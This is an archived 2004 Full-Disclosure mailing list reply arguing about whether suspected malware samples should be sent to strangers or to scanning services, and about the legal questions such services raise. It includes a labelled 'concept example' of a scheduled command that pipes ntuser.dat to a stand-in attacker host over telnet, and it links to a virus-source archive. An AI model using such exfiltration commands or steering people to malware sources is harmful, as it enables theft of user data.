| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: jftucker at gmail.com (James Tucker) Subject: win2kup2date.exe ? On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey <keydet89@...oo.com> wrote: > James, > > I'm replying off-list for the simple fact that I can't > believe the post you sent to FD. Your questions back > to Nick are...well, what's the right word???...it's as > if you're not even paying attention. Apologies I will try to explain myself. I am sending this back to the list, as it is obvious that my meaning was not clear, and there may be some points to be learned by others also. Thank you for pointing this out to me. > > > > ... If you want to email me a copy of it, I'll > > > > rip it apart and see what can be seen. > > > > > > And world plus dog should entrust you with such > > material because??? > > ... most viruses, trojans and malware to not store > > copies of stolen > > data in their executables. Furthermore the file size > > is very small. > > Interesting answer, but completely non-sequitor. Nick > asked why this person should be trusted with a live > bit of malware, and your response is that it's not > very big??? What does that have to do with anything? Malware and viruses are VERY readily available in many places accross the internet. Therefore this point should be of no concern. The only other concern which may be important is the possibility that the binary is carrying data from the infected system; it was this that I was refering to. Please accept my apology for not making this clearer. > > > P.S. Send it to [...] - it's my "catch all" for > > > > virus/unknown files. Just be sure to ZIP it up > > or else the web host > > > > won't let it through. Otherwise I have disabled > > all checks/scan. > > > > Downloads directly to a secured Linux box. > > > > > > That's all very nice, but alone, far from the > > makings of someone to > > > entrust arbitrary, suspected malware samples to. > > > > "Entrust", just what exactly are you thinking you > > might be giving away? > > Well, it's pretty obvious...a live bit of malware. > It's really pretty obvious what Nick's getting > at...why send this malware to some arbitrary person? > Who's to say that he's going to use it as he says, and > not send it back out to someone else? To what end? It would be much more useful to an attacker to go and collect and customise one of the many readily available trojans on the internet, rather than spreading malware which they have no control over. IMHO your concern is closer to cynicism than practical reality. > > Again, you suspect allot of deception here, and > > while it is of course > > possible you are correct, I have yet to see this > > ever done in practice. > > You haven't seen deception in practice...in general, > or specifically in the case of VirusTotal? If the virus was carrying data from the local system, and some hackers had set up a fake site of the VirusTotal sort, this would be a sophisticated way of decieving "security pros" into passing out details. It would be easily possible to carry all of their password hashes, for example, if any of them run VPNs this would be a near instant release of access passwords (an army of several hundred zombies could decode all the LM hashes in minutes). > > Samples of non-data carrying viruses or > > trojans are of > > little use to anyone other than Anti-Virus firms, as > > it is easy to > > collect raw source for most if one is so inclined. > > Really? Are you able to do so? I would submit that > many with malicious intent don't know the sites and > sources you seem to be aware of, and will actually ask > for the binary...for the purpose of releasing it > against someone else. Non-data carrying or otherwise, > it doesn't matter. I received several IMs just this > weekend in which I was asked for running viruses. Well, the same lack of trust may be given to you. In order find a balence between proving my point and not providing you with up to date info, I will provide you with this (http://vx.netlux.org/) site as an example, which is not carrying any modern sources at this time. You can find these easily by trawling security sites of high standards, they have outbound links to such sites. Google is rarely your freind in this regard, which may be why you are not aware of the high numeracy of such sites on the internet. Needless to say that this lack of awareness is possibly a good thing for most people (read: reduces script-kiddie access to such data). > > I agree that it is unlikely they have sufficient > > client licenses to > > provide such a service; however I can see that there > > are a great deal > > of arguments in law about how their case may be won. > > If a product is used in a manner for which it is not > sufficiently or correctly licensed, how can one then > use the law to win their case? After all, it wouldn't > be "their" (ie, VirusTotal's) case...it would be a > case brought against them by the vendor. I am not a lawyer, but I have seen cases won due to lack of definition of a license. In this case the argument I gave is not contradicted by any of the licenses involved as far as I can see. As I said though, I am not a lawyer. > > They may for > > example only be required to carry one license, they > > could argue that > > they are simply allowing users to deliberately > > infect their systems, > > and making portions of the logs publicly available. > > That does make any sense at all...if they are required > to carry only one license, then their copy of the > product would be sufficiently licensed, and any case > brought against them would be over before it started. My point exactly, until the case is brought into a court room it is probably one of the lesser defined scenarios under current interpretation of law. > > If there are viruses which commonly copy target > > system data, or > > sensitive data into their binaries at the present > > time (I imagine the > > mention of this deception may well spring at least > > one such virus) > > then I apologise that I am not aware of it. > > Does it matter exactly what the malicious code does? In this case the deception could be very serious as capturing the password details of a security professional is arguably more "interesting" and might (possibly) be more valuable to an attacker. This would be a good deceptive method of doing so. As to whether generically it matters what a virus does, no, of course if a virus is defined as being such, it is malicious and should be removed anyway. Sometimes it is important to know its functionality, as what if it had secretly run a command like: at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337" The antivirus program would remove the virus, but your registry data would still get sent to the hacker site as this data is not illegal in the system. Before anyone has a go at me over access to ntuser.dat / timing issues / whatever, this is concept example only; use your heads please. > > There is always no need for aggressive statement of > > suspicion, which you are close to here. > > While I understand aggression due to anger, I > > am concerned that one should not get angry at > > someone offering them a > > service merely because one is suspicious of them. > > What if the offer of help is entirely genuine? > > I think that you're entirely missing the point, as > I've already pointed out. I apologise that this message of mine was not as clear as it should have been. Thank you for pointing it out to me.
Powered by blists - more mailing lists